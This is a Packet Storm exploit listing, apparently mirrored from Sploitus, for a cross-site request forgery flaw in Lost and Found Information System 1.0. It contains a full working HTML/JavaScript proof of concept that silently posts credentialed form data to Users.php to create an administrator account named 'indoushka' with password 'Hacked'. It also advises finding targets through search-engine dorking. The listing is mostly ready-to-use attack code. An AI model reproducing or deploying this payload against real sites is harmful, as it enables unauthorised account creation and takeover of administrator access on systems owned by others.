Lost and Found Information System 1.0 Cross Site Request Forgery exploit

Share

## https://sploitus.com/exploit?id=PACKETSTORM:180259 ============================================================================================================================================= | # Title : Lost and Found Information System v1.0 v1.0 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] The following JavaScript code : creating a POST request using JavaScript to send certain data to a local server via HTTP. Here are the key points: [+] Create an XMLHttpRequest object: xhr = new XMLHttpRequest(); Creates an XMLHttpRequest object that is used to send requests to the server. [+] Open the request: xhr.open("POST", "http://127.0.0.1/php-lfis/classes/Users.php?f=save", true); Opens a connection to the specified URL (in this case, a local server) using the HTTP method "POST". [+] Set the request headers: xhr.setRequestHeader("Accept", "*/*"); Specifies that the request accepts any type of response. xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); Specifies that the request accepts responses in English. xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------"); Specifies the content type of the request as multipart/form-data with specified boundaries. [+] Enable sending cookies: xhr.withCredentials = true; Specifies that cookies should be sent with the request. [+] Setting up the request data: The body is set up using a string containing the form data parts. Each part contains information such as username, password, and type. This string is converted to a Uint8Array and then to a Blob to be sent. [+] Sending the request: xhr.send(new Blob([aBody])); Sends the data to the server. [+] User Interface: There is a button inside the HTML form that calls the submitRequest() function when clicked, which executes the request. [+] Go to the line 6. Set the target site link Save changes and apply . [+] infected file : Users.php. [+] Line 15 : Choose a name "indoushka". [+] Line 19 : Choose a pass "Hacked". [+] save code as poc.html [+] payload : <!DOCTYPE html> <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/127.0.0.1\/php-lfis\/classes\/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true; var body = "-----------------------------\r\n" + "Content-Disposition: form-data; name=\"username\"\r\n" + "\r\n" + "indoushka\r\n" + "-----------------------------\r\n" + "Content-Disposition: form-data; name=\"password\"\r\n" + "\r\n" + "Hacked\r\n" + "-----------------------------\r\n" + "Content-Disposition: form-data; name=\"type\"\r\n" + "\r\n" + "1\r\n" + "-------------------------------\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================